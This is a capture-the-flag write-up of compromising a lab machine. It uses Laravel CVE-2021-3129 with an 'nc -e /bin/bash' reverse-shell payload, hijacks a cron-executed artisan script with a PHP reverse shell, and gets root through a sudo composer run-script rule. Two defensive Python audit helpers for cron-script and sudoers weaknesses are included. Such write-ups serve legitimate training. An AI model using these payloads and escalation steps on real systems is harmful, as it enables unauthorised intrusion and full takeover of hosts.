Key takeaways
- Sometimes you need to create more than one reverse shell
- Cronjob script hijacking
- sudo composer privilege escalation
Detailed steps
As usual, start with nmap. Only ports 22 and 80 are open; fairly straightforward, but not necessarily easy.
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-11-06 07:20 UTC
Nmap scan report for 192.168.59.38
Host is up (0.00079s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.4p1 Debian 5+deb11u2 (protocol 2.0)
| ssh-hostkey:
| 3072 c9:c3:da:15:28:3b:f1:f8:9a:36:df:4d:36:6b:a7:44 (RSA)
| 256 26:03:2b:f6:da:90:1d:1b:ec:8d:8f:8d:1e:7e:3d:6b (ECDSA)
|_ 256 fb:43:b2:b0:19:2f:d3:f6:bc:aa:60:67:ab:c1:af:37 (ED25519)
80/tcp open http Apache httpd 2.4.56 ((Debian))
|_http-title: W3.CSS Template
|_http-server-header: Apache/2.4.56 (Debian)
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
Browsing port 80 doesn't reveal much, but clicking the dropdown prompts for a login, so create a user and log in.
This gives the following:
Uploading an arbitrary image doesn't seem to do anything interesting either.
Clicking any file in ImageList opens a preview.
While testing for a local file inclusion vulnerability, we unexpectedly find that the 404 page reveals Laravel 8.4.0 is running.
So we search for known vulnerabilities and find GitHub - zhzyker/CVE-2021-3129: Laravel <= v8.4.2 debug mode: Remote code execution (CVE-2021-3129)
Running it, the script turns out to be fairly comprehensive: it tries several different RCE exploits, some of which succeed and some of which fail.
C:\home\kali\Documents\OFFSEC\GoToWork\Lavita\CVE-2021-3129-main> python exp.py http://192.168.175.38
[*] Try to use Laravel/RCE1 for exploitation.
PHP Deprecated: Creation of dynamic property PHPGGC::$options is deprecated in /home/kali/Documents/OFFSEC/GoToWork/Lavita/CVE-2021-3129-main/lib/PHPGGC.php on line 779
PHP Deprecated: Creation of dynamic property PHPGGC::$parameters is deprecated in /home/kali/Documents/OFFSEC/GoToWork/Lavita/CVE-2021-3129-main/lib/PHPGGC.php on line 780
PHP Deprecated: Creation of dynamic property PHPGGC\Enhancement\Enhancements::$enhancements is deprecated in /home/kali/Documents/OFFSEC/GoToWork/Lavita/CVE-2021-3129-main/lib/PHPGGC/Enhancement/Enhancements.php on line 9
PHP Deprecated: Creation of dynamic property PHPGGC::$enhancements is deprecated in /home/kali/Documents/OFFSEC/GoToWork/Lavita/CVE-2021-3129-main/lib/PHPGGC.php on line 142
PHP Deprecated: Creation of dynamic property PHPGGC\Phar\Phar::$metadata is deprecated in /home/kali/Documents/OFFSEC/GoToWork/Lavita/CVE-2021-3129-main/lib/PHPGGC/Phar/Format.php on line 27
PHP Deprecated: Creation of dynamic property PHPGGC\Phar\Phar::$dummy_metadata is deprecated in /home/kali/Documents/OFFSEC/GoToWork/Lavita/CVE-2021-3129-main/lib/PHPGGC/Phar/Format.php on line 78
[+]exploit:
[*] Laravel/RCE1 Result:
[*] Try to use Laravel/RCE2 for exploitation.
PHP Deprecated: Creation of dynamic property PHPGGC::$options is deprecated in /home/kali/Documents/OFFSEC/GoToWork/Lavita/CVE-2021-3129-main/lib/PHPGGC.php on line 779
PHP Deprecated: Creation of dynamic property PHPGGC::$parameters is deprecated in /home/kali/Documents/OFFSEC/GoToWork/Lavita/CVE-2021-3129-main/lib/PHPGGC.php on line 780
PHP Deprecated: Creation of dynamic property PHPGGC\Enhancement\Enhancements::$enhancements is deprecated in /home/kali/Documents/OFFSEC/GoToWork/Lavita/CVE-2021-3129-main/lib/PHPGGC/Enhancement/Enhancements.php on line 9
PHP Deprecated: Creation of dynamic property PHPGGC::$enhancements is deprecated in /home/kali/Documents/OFFSEC/GoToWork/Lavita/CVE-2021-3129-main/lib/PHPGGC.php on line 142
PHP Deprecated: Creation of dynamic property PHPGGC\Phar\Phar::$metadata is deprecated in /home/kali/Documents/OFFSEC/GoToWork/Lavita/CVE-2021-3129-main/lib/PHPGGC/Phar/Format.php on line 27
PHP Deprecated: Creation of dynamic property PHPGGC\Phar\Phar::$dummy_metadata is deprecated in /home/kali/Documents/OFFSEC/GoToWork/Lavita/CVE-2021-3129-main/lib/PHPGGC/Phar/Format.php on line 78
[+]exploit:
[*] Laravel/RCE2 Result:uid=33(www-data) gid=33(www-data) groups=33(www-data)
[*] Try to use Laravel/RCE3 for exploitation.
PHP Deprecated: Creation of dynamic property PHPGGC::$options is deprecated in /home/kali/Documents/OFFSEC/GoToWork/Lavita/CVE-2021-3129-main/lib/PHPGGC.php on line 779
PHP Deprecated: Creation of dynamic property PHPGGC::$parameters is deprecated in /home/kali/Documents/OFFSEC/GoToWork/Lavita/CVE-2021-3129-main/lib/PHPGGC.php on line 780
PHP Deprecated: Creation of dynamic property PHPGGC\Enhancement\Enhancements::$enhancements is deprecated in /home/kali/Documents/OFFSEC/GoToWork/Lavita/CVE-2021-3129-main/lib/PHPGGC/Enhancement/Enhancements.php on line 9
PHP Deprecated: Creation of dynamic property PHPGGC::$enhancements is deprecated in /home/kali/Documents/OFFSEC/GoToWork/Lavita/CVE-2021-3129-main/lib/PHPGGC.php on line 142
PHP Deprecated: Creation of dynamic property PHPGGC\Phar\Phar::$metadata is deprecated in /home/kali/Documents/OFFSEC/GoToWork/Lavita/CVE-2021-3129-main/lib/PHPGGC/Phar/Format.php on line 27
PHP Deprecated: Creation of dynamic property PHPGGC\Phar\Phar::$dummy_metadata is deprecated in /home/kali/Documents/OFFSEC/GoToWork/Lavita/CVE-2021-3129-main/lib/PHPGGC/Phar/Format.php on line 78
[+]exploit:
[*] Laravel/RCE3 Result:......
......
After reviewing the code, I decided to use Laravel/RCE5 to create a reverse shell, changing the RCE5 entry in exp.py to the following
......
......"Laravel/RCE5":r"""php -d "phar.readonly=0" ./phpggc Laravel/RCE5 "system('nc -e /bin/bash 192.168.45.224 80');" --phar phar -o php://output | base64 -w 0 | python -c "import sys;print(''.join(['=' + hex (ord(i))[2:] + '=00' for i in sys.stdin.read()]).upper())"
......
......
After starting nc -nlvp locally, run exp.py to get a reverse shell, which is also enough to grab the first flag
C:\home\kali\Documents\OFFSEC\GoToWork\Lavita\CVE-2021-3129-main> nc -nlvp 80
listening on [any] 80 ...
connect to [192.168.45.224] from (UNKNOWN) [192.168.175.38] 52528
id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
whereis python
python: /usr/bin/python3.9 /usr/lib/python2.7 /usr/lib/python3.9 /etc/python3.9 /usr/local/lib/python3.9
/usr/bin/python3.9 -c 'import pty;pty.spawn("/bin/bash")'
www-data@debian:/$ cat /home/skunk/local.txt
cat /home/skunk/local.txt
30bcf5f4e648c694496fabd9e13acd7f
Upload linpeas and pspy64 and run each of them.
The linpeas.sh output contains database information, but it is not much help; it does show, however, that the www-data and skunk users are interesting, so keep an eye on them.
......
......
uid=1001(skunk) gid=1001(skunk) groups=1001(skunk),27(sudo),33(www-data)
......
......
uid=33(www-data) gid=33(www-data) groups=33(www-data)
......
......
In the pspy64 output we find the following; it looks like the skunk user periodically cleans up the pictures under /var/www/html/lavita
2024/11/06 03:20:01 CMD: UID=1001 PID=16578 | /usr/bin/php /var/www/html/lavita/artisan clear:pictures
So we can consider hijacking artisan to gain skunk's privileges, since there is no way to get root directly at the moment. Modify the ip and port in php-reverse-shell.php, upload it to the remote host, rename it to overwrite /var/www/html/lavita/artisan, run nc -nlvp 3306 locally, and after a short wait we get the second reverse shell
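The hijack above works only because a scheduled job running as skunk executes a file that www-data can rewrite. As an added defensive check (not part of the original writeup), this script parses pspy-style lines, resolves the file really being executed (skipping the interpreter), and flags any job whose script can be modified by a uid other than root and the job's own uid. File metadata and group membership are constructed stand-ins for os.stat() and /etc/group, modelled on the id output shown above.

```python
import re
# pspy prints "<date> <time> CMD: UID=<uid> PID=<pid> | <command line>"
PSPY_RE = re.compile(r"^\S+ \S+ CMD: UID=(?P<uid>\d+) PID=\d+ \| (?P<cmd>.+)$")
# When argv[0] is an interpreter, the file actually executed is argv[1].
INTERPRETERS = {"/usr/bin/php", "/usr/bin/python3.9", "/bin/sh", "/bin/bash"}
# Constructed stand-in for os.stat(): path -> (owner_uid, group_gid, mode). artisan sits in
# the web root, owned by www-data (uid 33) and owner/group-writable; backup.sh is root-only.
SAMPLE_FS = {
    "/var/www/html/lavita/artisan": (33, 33, 0o664),
    "/usr/local/bin/backup.sh": (0, 0, 0o755),
}
# Constructed group membership (uid -> gids), matching the id output in the writeup.
SAMPLE_GROUPS = {0: {0}, 33: {33}, 1001: {1001, 27, 33}}

def script_of(cmd):
    """Return the path of the file a pspy command line really executes."""
    argv = cmd.split()
    if len(argv) > 1 and argv[0] in INTERPRETERS and argv[1].startswith("/"):
        return argv[1]
    return argv[0] if argv else None

def can_write(uid, gids, meta):
    owner, group, mode = meta
    return bool((uid == owner and mode & 0o200)
                or (group in gids and mode & 0o020)
                or mode & 0o002)

def other_writers(path, runner_uid, fs=SAMPLE_FS, groups=SAMPLE_GROUPS):
    meta = fs.get(path)  # uids other than root and the runner that can modify the file
    if meta is None:
        return set()
    return {uid for uid, gids in groups.items()
            if uid not in (0, runner_uid) and can_write(uid, gids, meta)}

def audit_pspy(lines, fs=SAMPLE_FS, groups=SAMPLE_GROUPS):
    """(runner_uid, path, writers) for each job whose script a less privileged user can edit."""
    findings = []
    for line in lines:
        m = PSPY_RE.match(line)
        path = script_of(m.group("cmd")) if m else None
        writers = other_writers(path, int(m.group("uid")), fs, groups) if path else set()
        if writers:
            findings.append((int(m.group("uid")), path, sorted(writers)))
    return findings

# Constructed sample: the line from the writeup plus a benign root cron job.
SAMPLE_PSPY = [
    "2024/11/06 03:20:01 CMD: UID=1001 PID=16578 | /usr/bin/php /var/www/html/lavita/artisan clear:pictures",
    "2024/11/06 03:25:01 CMD: UID=0 PID=16590 | /bin/bash /usr/local/bin/backup.sh",
]
```

On a real host, replace SAMPLE_FS and SAMPLE_GROUPS with os.stat() and the grp module; the finding for artisan is what a file-ownership fix (root-owned, not group-writable) removes.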
C:\home\kali\Documents\OFFSEC\GoToWork\Lavita\CVE-2021-3129-main> nc -nlvp 3306
listening on [any] 3306 ...
connect to [192.168.45.224] from (UNKNOWN) [192.168.175.38] 47702
Linux debian 5.10.0-25-amd64 #1 SMP Debian 5.10.191-1 (2023-08-16) x86_64 GNU/Linux
 03:59:02 up 1:26, 0 users, load average: 0.00, 0.00, 0.00
USER TTY FROM LOGIN@ IDLE JCPU PCPU WHAT
uid=1001(skunk) gid=1001(skunk) groups=1001(skunk),27(sudo),33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
skunk
$ id
uid=1001(skunk) gid=1001(skunk) groups=1001(skunk),27(sudo),33(www-data)
$ /usr/bin/python3.9 -c 'import pty;pty.spawn("/bin/bash")'
skunk@debian:/$
Running sudo -l shows that /usr/bin/composer --working-dir\=/var/www/html/lavita * can be run as root without a password, and the trailing wildcard means extra arguments can be appended
skunk@debian:/$ sudo -l
sudo -l
Matching Defaults entries for skunk on debian:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User skunk may run the following commands on debian:
    (ALL : ALL) ALL
    (root) NOPASSWD: /usr/bin/composer --working-dir\=/var/www/html/lavita *
Following the method from GTFOBins,
adapt it as follows. If the first command can't be executed from skunk's reverse shell, run it from the www-data reverse shell instead and run the second command from skunk's reverse shell
echo '{"scripts":{"x":"/bin/sh -i 0<&3 1>&3 2>&3"}}' > /var/www/html/lavita/composer.json
sudo /usr/bin/composer --working-dir\=/var/www/html/lavita run-script x
Privilege escalation successful
<er --working-dir\=/var/www/html/lavita run-script x
Do not run Composer as root/super user! See https://getcomposer.org/root for details
Continue as root/super user [yes]? yes
yes
> /bin/sh -i 0<&3 1>&3 2>&3
# whoami
whoami
root
# cat /root/proof.txt
cat /root/proof.txt
658e350be2cb99b3128f15ac634d1b3e
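Two properties of the sudo rule above combine to make the escalation possible: the trailing `*` lets the caller pick the composer subcommand, and the pinned working directory is writable by the caller, so they control the composer.json whose scripts composer runs as root. As an added audit helper (not part of the original writeup or of any sudo/composer tooling), this parses a command spec as printed by `sudo -l` and reports both conditions; the directory-writability table and the tighter comparison rule are constructed for the example.

```python
import re
import shlex

# One sudoers command spec as printed by "sudo -l": "(runas) [TAG:]... command args".
RULE_RE = re.compile(r"^\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmd>.+)$")

# Constructed: directory -> uids that can write into it. In the writeup skunk (1001)
# is in the www-data group, so it can write into the Laravel web root.
SAMPLE_WRITABLE = {"/var/www/html/lavita": {33, 1001}, "/opt/lavita-build": {0}}

def parse_rule(rule):
    """Return (runas_user, tags, argv) for a sudoers command spec."""
    m = RULE_RE.match(rule.strip())
    if not m:
        raise ValueError("not a command spec: " + rule)
    tags = {t.rstrip(":") for t in m.group("tags").split()}
    # sudoers escapes '=' inside a command as '\='; drop the backslash before splitting.
    argv = shlex.split(m.group("cmd").replace("\\=", "="))
    return m.group("runas").split(":")[0].strip(), tags, argv

def audit_composer_rule(rule, sudoer_uid, writable=SAMPLE_WRITABLE):
    """Findings for a composer sudo rule: a trailing '*' lets the caller choose the
    subcommand (run-script, ...), and a working directory the caller can write to
    lets them supply the composer.json whose scripts composer executes as runas."""
    runas, tags, argv = parse_rule(rule)
    findings = []
    if not argv or not argv[0].endswith("/composer"):
        return findings
    if "*" in argv:
        findings.append("wildcard-args")
    workdir = next((a.split("=", 1)[1] for a in argv if a.startswith("--working-dir=")), None)
    if workdir is None:
        findings.append("no-fixed-working-dir")
    elif sudoer_uid in writable.get(workdir, set()):
        findings.append("sudoer-writable-working-dir")
    if findings and runas == "root" and "NOPASSWD" in tags:
        findings.append("root-nopasswd")
    return findings

# The rule from the writeup, and a tighter constructed variant: fixed subcommand and a
# working directory only root can write to (composer still runs that dir's scripts).
PAGE_RULE = r"(root) NOPASSWD: /usr/bin/composer --working-dir\=/var/www/html/lavita *"
TIGHTER_RULE = r"(root) NOPASSWD: /usr/bin/composer --working-dir\=/opt/lavita-build install"
```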